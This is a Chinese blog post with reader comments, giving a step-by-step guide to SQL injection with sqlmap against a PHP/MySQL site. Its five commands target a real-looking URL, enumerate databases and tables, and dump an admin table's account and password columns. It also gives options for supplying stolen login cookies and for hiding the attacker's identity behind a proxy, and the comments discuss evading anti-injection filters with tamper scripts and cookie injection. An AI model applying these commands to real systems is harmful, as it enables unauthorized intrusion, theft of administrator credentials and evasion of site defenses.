sqlmap注入常见用法一条龙

sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:

  1. 检查注入点
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
  2. 列数据库信息
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
  3. 指定库名列出所有表
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
  4. 指定库名表名列出所有字段
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
  5. 指定库名表名字段dump出指定字段
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档

  • --cookie=COOKIE                 在需要登录的地方,需要登录后的cookie
    --proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
    --sql-query=QUERY               执行一个sql语句,不一定支持

过程的几张图如下: sqlmap step1 sqlmap step2 sqlmap step3 sqlmap step4 sqlmap-step6

本文标题:sqlmap注入常见用法一条龙
本文链接:https://www.nigesb.com/sqlmap-common-usage-and-examples.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

7 条评论。

  1. –被显示成“–”了

  2. 是Pangolin,我也来找茬!

  3. 楼主知道如何使用sqlmap来绕过垃圾的防注入系统吗?
    手动用cookie绕过感觉有点麻烦,看别的教程好像要加–tamper选项,但是我都没有成功

  4. sqlmap -u “注入点” –cookie “id=参数” –level 3

    cookie 注入

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>